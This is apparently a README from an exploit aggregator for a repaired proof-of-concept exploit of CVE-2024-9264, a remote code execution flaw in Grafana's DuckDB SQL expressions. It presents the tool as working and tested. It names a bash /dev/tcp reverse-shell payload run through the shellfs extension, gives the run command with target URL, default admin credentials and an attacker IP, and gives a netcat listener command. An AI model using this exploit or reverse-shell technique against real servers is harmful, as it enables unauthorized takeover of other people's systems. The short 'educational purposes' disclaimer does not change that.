## https://sploitus.com/exploit?id=07B1895C-6981-5395-9E9A-4B9615DFAAD5
# ๐ ๏ธ CVE-2024-9264 - Fixed Grafana RCE Exploit
This is a **fixed version** of the proof-of-concept exploit for **CVE-2024-9264**, a critical remote code execution vulnerability in Grafana (via SQL expressions and DuckDB).
๐ Original advisory: [Grafana Security Release](https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/)
โ Original PoC: Broken due to syntax errors and incorrect use of `write_file()`
โ This version works, tested on a vulnerable Grafana 11.0.0 instance.
---
## โ Fixes in this version
- โ Correctly uses `writefile()` instead of `write_file()` (DuckDB function)
- โ Proper shell payload using `bash -i >& /dev/tcp/...`
- โ Reverse shell written and executed successfully via `shellfs` extension
---
## ๐ฆ Requirements
- Grafana instance with:
- DuckDB backend
- Ability to `install shellfs from community`
- A netcat listener on your attacker machine
---
## ๐ Usage
```bash
python3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
```
Then listen with:
```bash
nc -lvnp 4444
```
---
## โ ๏ธ Legal Disclaimer
This project is **for educational purposes only**.
Do not use it against targets you do not have permission to test.
---
## โ๏ธ Author of this Fix
Modified and validated by [Exerr](https://github.com/Exerrdev) โ original PoC by z3k0sec.